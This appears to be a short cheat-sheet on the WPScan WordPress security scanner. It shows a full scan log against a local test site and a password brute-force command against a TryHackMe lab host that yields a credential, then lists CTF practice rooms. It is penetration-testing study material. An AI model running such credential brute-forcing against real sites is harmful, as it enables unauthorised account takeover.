WPScan - WordPress Security Scanner

https://wpscan.com/wordpress-security-scanner

Source code on GitHub: https://github.com/wpscanteam/wpscan

# wpscan --url http://127.0.0.1:8080
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.14
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://127.0.0.1:8080/ [127.0.0.1]
[+] Started: Sat Mar 13 09:41:21 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://127.0.0.1:8080/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://127.0.0.1:8080/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://127.0.0.1:8080/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.5 identified (Insecure, released on 2018-04-03).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://127.0.0.1:8080/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.5'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://127.0.0.1:8080/, Match: 'WordPress 4.9.5'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:01 <===========================================> (22 / 22) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Mar 13 09:41:32 2021
[+] Requests Done: 47
[+] Cached Requests: 4
[+] Data Sent: 11.353 KB
[+] Data Received: 122.766 KB
[+] Memory used: 193.074 MB
[+] Elapsed time: 00:00:11
#

Brute force password

wpscan --url http://10.10.87.140/wordpress -U elyana -P pass2.txt
...
[!] Valid Combinations Found:
 | Username: elyana, Password: H@ckme@123
...

Practice

>>> THM | Cyber Scotland 2021

>>> THM | Badbyte

>>> THM | Wekor

>>> THM | Internal

>>> THM | Different CTF
